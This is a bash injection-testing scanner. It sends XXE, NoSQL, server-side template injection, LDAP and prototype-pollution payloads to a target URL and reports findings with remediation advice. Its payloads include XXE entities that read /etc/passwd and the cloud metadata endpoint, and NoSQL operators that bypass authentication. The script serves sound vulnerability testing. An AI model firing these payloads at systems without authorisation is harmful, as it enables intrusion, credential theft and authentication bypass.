#!/bin/bash
# Advanced Injection Testing Script - CWE-79, CWE-611, CWE-90, CWE-943, CWE-94, CWE-1321, CWE-235
# Usage: ./injection-advanced-test.sh [TARGET_URL] [MODE]

set -e
[[ "$1" == "-h" ]] && { echo "💉 Advanced Injection Scanner - XXE, NoSQL, SSTI, LDAP, Prototype Pollution"; exit 0; }

TARGET_URL="${1:-}"; MODE="${2:-full}"; CLEAN_OUTPUT="${3:-false}"
AUTH_COOKIE="${AUTH_COOKIE:-}"
AUTH_TOKEN="${AUTH_TOKEN:-}"
[ -z "$TARGET_URL" ] && { echo "❌ Error: Target URL required"; exit 1; }
[[ ! "$TARGET_URL" =~ ^https?:// ]] && TARGET_URL="https://$TARGET_URL"
TARGET_URL="${TARGET_URL%/}"

[[ "$CLEAN_OUTPUT" = "true" ]] && { RED=''; GREEN=''; YELLOW=''; PURPLE=''; NC=''; } || \
{ RED='\033[0;31m'; GREEN='\033[0;32m'; YELLOW='\033[1;33m'; PURPLE='\033[0;35m'; NC='\033[0m'; }

TESTS_PASSED=0; TESTS_FAILED=0; TESTS_TOTAL=0; HIGH_RISK_FINDINGS=0; HIGH_RISK_LIST=()
AUTH_ERRORS=0  # Track 401/403 responses

# Helper function for authenticated curl requests (supports cookie and bearer token)
auth_curl() {
    if [ -n "$AUTH_TOKEN" ]; then
        curl --connect-timeout 10 --max-time 30 -H "Authorization: Bearer $AUTH_TOKEN" "$@"
    elif [ -n "$AUTH_COOKIE" ]; then
        curl --connect-timeout 10 --max-time 30 --cookie "$AUTH_COOKIE" "$@"
    else
        curl --connect-timeout 10 --max-time 30 "$@"
    fi
}

# Helper function to check for auth errors (401/403) and track them
check_auth_error() {
    local response="$1"
    local status=$(echo "$response" | head -1 | grep -oE 'HTTP/[0-9.]+ [0-9]+' | grep -oE '[0-9]+$')
    if [ "$status" = "401" ] || [ "$status" = "403" ]; then
        AUTH_ERRORS=$((AUTH_ERRORS + 1))
        return 0  # true - auth error
    fi
    return 1  # false - no auth error
}

echo -e "${PURPLE}💉 ADVANCED INJECTION SCANNER${NC}"
echo -e "Target: ${TARGET_URL} | Mode: ${MODE}"
[ -n "$AUTH_TOKEN" ] && echo -e "${GREEN}🔐 Bearer token authentication enabled${NC}"
[ -n "$AUTH_COOKIE" ] && echo -e "${GREEN}🔐 Cookie authentication enabled${NC}"
[ -z "$AUTH_TOKEN" ] && [ -z "$AUTH_COOKIE" ] && echo -e "${YELLOW}ℹ️ Running without authentication${NC}"

echo -e ""

test_xxe() {
    echo -e "\n${YELLOW}📄 PHASE 1: XXE INJECTION (CWE-611)${NC}"
    TESTS_TOTAL=$((TESTS_TOTAL + 1)); local vuln=false

    local xxe_payloads=(
        '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
        '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><foo>&xxe;</foo>'
    )

    for payload in "${xxe_payloads[@]}"; do
        local response=$(auth_curl -si -X POST "${TARGET_URL}" \
            -H "Content-Type: application/xml" \
            -d "$payload" --max-time 10 2>/dev/null || echo "")

        # Check for auth errors
        if echo "$response" | head -1 | grep -qE "HTTP/[0-9.]+ (401|403)"; then
            AUTH_ERRORS=$((AUTH_ERRORS + 1))
            continue
        fi

        if echo "$response" | grep -qiE "root:|localhost|ami-id|instance-id"; then
            vuln=true; echo -e "${RED}  ⚠️ XXE vulnerability detected${NC}"; break
        fi
    done

    if [ "$vuln" = true ]; then
        echo -e "${RED}❌ FAIL: XXE Injection (XML External Entity)${NC}"
        echo "   RISK: High - Attackers can read server files, perform SSRF, or cause denial of service (CWE-611)"
        echo "   WHAT: XML parser processes external entity references, allowing access to local files or internal services"
        echo "   FIX: Disable external entity processing in XML parsers; use JSON instead of XML where possible"
        echo "   EXAMPLE: In Java: factory.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true)"
        TESTS_FAILED=$((TESTS_FAILED + 1)); HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1)); HIGH_RISK_LIST+=("XXE Injection (CWE-611)")
    else
        echo -e "${GREEN}✅ PASS: XXE not detected${NC}"; TESTS_PASSED=$((TESTS_PASSED + 1))
    fi
}

test_nosql_injection() {
    echo -e "\n${YELLOW}🗄️ PHASE 2: NOSQL INJECTION (CWE-943)${NC}"
    TESTS_TOTAL=$((TESTS_TOTAL + 1)); local vuln=false

    local nosql_payloads=(
        '{"username":{"$ne":""},"password":{"$ne":""}}'
        '{"username":{"$gt":""},"password":{"$gt":""}}'
        '{"$where":"1==1"}'
        '{"username":"admin","password":{"$regex":".*"}}'
    )

    for payload in "${nosql_payloads[@]}"; do
        local response=$(auth_curl -si -X POST "${TARGET_URL}" \
            -H "Content-Type: application/json" \
            -d "$payload" --max-time 10 2>/dev/null || echo "")

        # Check for auth errors
        if echo "$response" | head -1 | grep -qE "HTTP/[0-9.]+ (401|403)"; then
            AUTH_ERRORS=$((AUTH_ERRORS + 1))
            continue
        fi

        if echo "$response" | grep -qiE "success|token|welcome|logged|dashboard"; then
            vuln=true; echo -e "${RED}  ⚠️ NoSQL injection bypass${NC}"; break
        fi
    done

    if [ "$vuln" = true ]; then
        echo -e "${RED}❌ FAIL: NoSQL Injection${NC}"
        echo "   RISK: High - Attackers can bypass authentication or extract database contents (CWE-943)"
        echo "   WHAT: NoSQL query operators like \$ne, \$gt, \$regex are accepted in user input"
        echo "   FIX: Validate and sanitize all input; use parameterized queries; reject JSON operators in user fields"
        echo "   EXAMPLE: In MongoDB/Node: use mongo-sanitize to strip \$ operators from req.body"
        TESTS_FAILED=$((TESTS_FAILED + 1)); HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1)); HIGH_RISK_LIST+=("NoSQL Injection (CWE-943)")
    else
        echo -e "${GREEN}✅ PASS: NoSQL injection blocked${NC}"; TESTS_PASSED=$((TESTS_PASSED + 1))
    fi
}

test_ssti() {
    echo -e "\n${YELLOW}🔧 PHASE 3: SERVER-SIDE TEMPLATE INJECTION (CWE-94)${NC}"
    TESTS_TOTAL=$((TESTS_TOTAL + 1)); local vuln=false

    # Generate unique canary values per run using prime multiplication
    # Products of two primes produce 4-5 digit numbers that virtually never appear naturally
    local primes=(53 59 61 67 71 73 79 83 89 97)
    local p1=${primes[$((RANDOM % ${#primes[@]}))]}
    local p2=${primes[$((RANDOM % ${#primes[@]}))]}
    # Ensure different primes
    while [ "$p1" = "$p2" ]; do p2=${primes[$((RANDOM % ${#primes[@]}))]}; done
    local canary=$((p1 * p2))

    # Template syntax payloads for various engines, using unique canary
    local ssti_payloads=(
        "{{${p1}*${p2}}}"          # Jinja2, Twig, Nunjucks
        "\${${p1}*${p2}}"          # Freemarker, Thymeleaf, Groovy
        "<%= ${p1}*${p2} %>"       # ERB (Ruby), EJS (Node.js)
        "#{${p1}*${p2}}"           # Slim, Pug/Jade
        "*{${p1}*${p2}}"           # Thymeleaf
    )

    # Object leak payloads (no canary needed — check for Python/Java internals)
    local leak_payloads=(
        '{{self.__class__.__mro__}}'
        '{{config.items()}}'
    )

    echo "  Using canary: ${p1}*${p2}=${canary}"

    for payload in "${ssti_payloads[@]}"; do
        local encoded=$(printf '%s' "$payload" | jq -sRr @uri)
        local response=$(auth_curl -si "${TARGET_URL}/?name=${encoded}" --max-time 10 2>/dev/null || echo "")

        # Check for auth errors
        if echo "$response" | head -1 | grep -qE "HTTP/[0-9.]+ (401|403)"; then
            AUTH_ERRORS=$((AUTH_ERRORS + 1))
            continue
        fi

        # Extract response body only (strip HTTP headers)
        local body=$(echo "$response" | sed '1,/^\r*$/d')

        # Check if the canary value appears in the body — exact match only
        if echo "$body" | grep -qE "(^|[^0-9])${canary}([^0-9]|$)"; then
            vuln=true; echo -e "${RED}  ⚠️ SSTI: ${payload} → evaluated to ${canary}${NC}"; break
        fi
    done

    # Test object leak payloads separately
    if [ "$vuln" = false ]; then
        for payload in "${leak_payloads[@]}"; do
            local encoded=$(printf '%s' "$payload" | jq -sRr @uri)
            local response=$(auth_curl -si "${TARGET_URL}/?name=${encoded}" --max-time 10 2>/dev/null || echo "")

            if echo "$response" | head -1 | grep -qE "HTTP/[0-9.]+ (401|403)"; then
                AUTH_ERRORS=$((AUTH_ERRORS + 1))
                continue
            fi

            local body=$(echo "$response" | sed '1,/^\r*$/d')

            if echo "$body" | grep -qiE '__class__|__mro__|SecretKey|SECRET_KEY'; then
                vuln=true; echo -e "${RED}  ⚠️ SSTI: ${payload} (template objects leaked)${NC}"; break
            fi
        done
    fi

    if [ "$vuln" = true ]; then
        echo -e "${RED}❌ FAIL: SSTI detected (Server-Side Template Injection)${NC}"
        echo "   RISK: High - Attackers can execute arbitrary code on the server (CWE-94)"
        echo "   WHAT: Template expressions are evaluated server-side, allowing code injection"
        echo "   FIX: Sanitize user input before passing to template engines; use logic-less templates"
        echo "   EXAMPLE: Use Mustache/Handlebars instead of Jinja2/Freemarker with raw expressions"
        TESTS_FAILED=$((TESTS_FAILED + 1)); HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1)); HIGH_RISK_LIST+=("SSTI (CWE-94)")
    else
        echo -e "${GREEN}✅ PASS: SSTI not detected${NC}"; TESTS_PASSED=$((TESTS_PASSED + 1))
    fi
}

test_ldap_injection() {
    echo -e "\n${YELLOW}📁 PHASE 4: LDAP INJECTION (CWE-90)${NC}"
    TESTS_TOTAL=$((TESTS_TOTAL + 1)); local vuln=false

    local ldap_payloads=("*" "*)(&" "*)(|(&" "admin)(&)" "*()|&'" "admin*")

    for payload in "${ldap_payloads[@]}"; do
        local encoded=$(printf '%s' "$payload" | jq -sRr @uri)
        local response=$(auth_curl -si "${TARGET_URL}?user=${encoded}" --max-time 10 2>/dev/null || echo "")

        # Check for auth errors
        if echo "$response" | head -1 | grep -qE "HTTP/[0-9.]+ (401|403)"; then
            AUTH_ERRORS=$((AUTH_ERRORS + 1))
            continue
        fi

        if echo "$response" | grep -qiE "ldap|directory|cn=|dn=|objectclass|admin.*found"; then
            vuln=true; echo -e "${RED}  ⚠️ LDAP injection: ${payload}${NC}"; break
        fi
    done

    if [ "$vuln" = true ]; then
        echo -e "${RED}❌ FAIL: LDAP Injection${NC}"
        echo "   RISK: High - Attackers can bypass authentication or query directory services (CWE-90)"
        echo "   WHAT: LDAP filter characters (*, ), |) are not sanitized, allowing query manipulation"
        echo "   FIX: Escape LDAP special characters in user input; use parameterized LDAP queries"
        TESTS_FAILED=$((TESTS_FAILED + 1)); HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1)); HIGH_RISK_LIST+=("LDAP Injection (CWE-90)")
    else
        echo -e "${GREEN}✅ PASS: LDAP injection blocked${NC}"; TESTS_PASSED=$((TESTS_PASSED + 1))
    fi
}

test_prototype_pollution() {
    echo -e "\n${YELLOW}🔗 PHASE 5: PROTOTYPE POLLUTION (CWE-1321)${NC}"
    TESTS_TOTAL=$((TESTS_TOTAL + 1)); local vuln=false

    local pp_payloads=(
        '{"__proto__":{"admin":true}}'
        '{"constructor":{"prototype":{"admin":true}}}'
        '{"__proto__":{"isAdmin":true}}'
    )

    for payload in "${pp_payloads[@]}"; do
        local response=$(auth_curl -si -X POST "${TARGET_URL}" \
            -H "Content-Type: application/json" \
            -d "$payload" --max-time 10 2>/dev/null || echo "")

        # Check for auth errors
        if echo "$response" | head -1 | grep -qE "HTTP/[0-9.]+ (401|403)"; then
            AUTH_ERRORS=$((AUTH_ERRORS + 1))
            continue
        fi

        if echo "$response" | grep -qiE "admin.*true|isAdmin.*true"; then
            vuln=true; echo -e "${RED}  ⚠️ Prototype pollution detected${NC}"; break
        fi
    done

    if [ "$vuln" = true ]; then
        echo -e "${RED}❌ FAIL: Prototype Pollution${NC}"
        echo "   RISK: High - Attackers can modify object prototypes to bypass security or execute code (CWE-1321)"
        echo "   WHAT: JSON properties like __proto__ or constructor.prototype are processed unsafely"
        echo "   FIX: Freeze Object.prototype; use Object.create(null) for maps; validate JSON keys"
        TESTS_FAILED=$((TESTS_FAILED + 1)); HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1)); HIGH_RISK_LIST+=("Prototype Pollution (CWE-1321)")
    else
        echo -e "${GREEN}✅ PASS: Prototype pollution blocked${NC}"; TESTS_PASSED=$((TESTS_PASSED + 1))
    fi
}

test_hpp() {
    echo -e "\n${YELLOW}📝 PHASE 6: HTTP PARAMETER POLLUTION (CWE-235)${NC}"
    TESTS_TOTAL=$((TESTS_TOTAL + 1)); local vuln=false

    # Test duplicate parameters
    local response=$(auth_curl -si "${TARGET_URL}?id=1&id=2" --max-time 10 2>/dev/null || echo "")
    local response2=$(auth_curl -si "${TARGET_URL}?id=1" --max-time 10 2>/dev/null || echo "")

    # Check for auth errors
    if echo "$response" | head -1 | grep -qE "HTTP/[0-9.]+ (401|403)"; then
        AUTH_ERRORS=$((AUTH_ERRORS + 1))
    fi

    if [ "$response" != "$response2" ] && echo "$response" | grep -qiE "2|multiple|array"; then
        echo -e "${YELLOW}  ℹ️ Different response with duplicate params (verify manually)${NC}"
    fi

    echo -e "${GREEN}✅ PASS: HPP test completed (manual verification recommended)${NC}"
    TESTS_PASSED=$((TESTS_PASSED + 1))
}

generate_summary() {
    echo -e "\n${PURPLE}======================================================${NC}"
    echo -e "${PURPLE}📊 ADVANCED INJECTION SUMMARY${NC}"
    local rate=0; [ $TESTS_TOTAL -gt 0 ] && rate=$((TESTS_PASSED * 100 / TESTS_TOTAL))
    echo -e "Tests: ${TESTS_TOTAL} | ${GREEN}Passed: ${TESTS_PASSED}${NC} | ${RED}Failed: ${TESTS_FAILED}${NC} | Rate: ${rate}%"
    echo -e "${RED}High Risk: ${HIGH_RISK_FINDINGS}${NC}"
    [ ${#HIGH_RISK_LIST[@]} -gt 0 ] && { echo -e "${RED}🚨 FINDINGS:${NC}"; for f in "${HIGH_RISK_LIST[@]}"; do echo -e "  ${RED}• ${f}${NC}"; done; }

    # Warn about authentication errors and potential false negatives
    if [ $AUTH_ERRORS -gt 0 ]; then
        echo -e "\n${YELLOW}⚠️  WARNING: ${AUTH_ERRORS} requests returned 401/403 Unauthorized${NC}"
        if [ -z "$AUTH_TOKEN" ] && [ -z "$AUTH_COOKIE" ]; then
            echo -e "${YELLOW}   Target may require authentication. Results may have FALSE NEGATIVES.${NC}"
            echo -e "${YELLOW}   To scan authenticated endpoints, provide credentials:${NC}"
            echo -e "${YELLOW}     AUTH_COOKIE=\"session=xxx\" or AUTH_TOKEN=\"Bearer xxx\"${NC}"
        else
            echo -e "${YELLOW}   Provided credentials may be invalid or expired.${NC}"
        fi
    fi

    local score=$((100 - HIGH_RISK_FINDINGS * 20)); [ $score -lt 0 ] && score=0
    echo -e "Score: $score/100"
    echo -e "${PURPLE}======================================================${NC}"
}

test_xxe
test_nosql_injection
test_ssti
[ "$MODE" = "full" ] && { test_ldap_injection; test_prototype_pollution; test_hpp; }
generate_summary
